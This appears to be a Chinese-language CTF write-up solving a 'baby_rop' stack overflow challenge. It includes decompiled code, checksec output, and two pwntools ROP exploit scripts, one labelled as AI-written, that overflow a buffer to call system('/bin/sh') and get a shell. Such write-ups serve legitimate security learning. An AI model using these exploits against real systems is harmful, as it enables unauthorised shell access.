Skip to content

baby_rop

反编译:

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char v4[16]; // [rsp+0h] [rbp-10h] BYREF

  system("echo -n \"What's your name? \"");
  __isoc99_scanf("%s", v4);
  printf("Welcome to the Pwn World, %s!\n", v4);
  return 0;
}

checksec 输出:

Arch:       amd64-64-little
RELRO:      Partial RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        No PIE (0x400000)
Stripped:   No

栈不可执行,因此用 ROP 来调用 system("/bin/sh"),程序中有 /bin/sh 的字符串,同时还有 system 的 plt stub:

from pwn import *

context(log_level="DEBUG")
context.terminal = ["tmux", "split-w", "-h"]
context.arch = "amd64"

if args.REMOTE:
    p = remote(args.HOST, args.PORT)
else:
    p = process("./babyrop")
elf = ELF("./babyrop")

rop = ROP(elf)
pop_rdi_ret = rop.find_gadget(["pop rdi", "ret"]).address
ret = rop.find_gadget(["ret"]).address


sh_addr = next(elf.search(b"/bin/sh\x00"))
payload = (
    b"A" * 0x18 + p64(pop_rdi_ret) + p64(sh_addr) + p64(ret) + p64(elf.plt["system"])
)
print(payload)
p.recvuntil(b"What's your name? ")
p.send(payload)
p.interactive()

AI 完成的攻击脚本,思路和上面是一样的:

from pwn import *

context.arch = 'amd64'
context.os = 'linux'

elf = ELF('./babyrop')

import sys
LOCAL = '--remote' not in sys.argv

if LOCAL:
    p = process('./babyrop')
else:
    p = remote('localhost', 9999)

# Gadgets
pop_rdi = 0x400683
ret = 0x400479

bin_sh = next(elf.search(b'/bin/sh'))
system_plt = elf.plt['system']

# Stack: [buf 16] [saved rbp 8] [ret addr]
payload = b'A' * 16  # fill buffer
payload += b'B' * 8   # saved rbp
payload += p64(ret)       # stack alignment
payload += p64(pop_rdi)   # pop rdi; ret
payload += p64(bin_sh)    # rdi = "/bin/sh"
payload += p64(system_plt)  # system("/bin/sh")

p.sendline(payload)
p.interactive()

Comments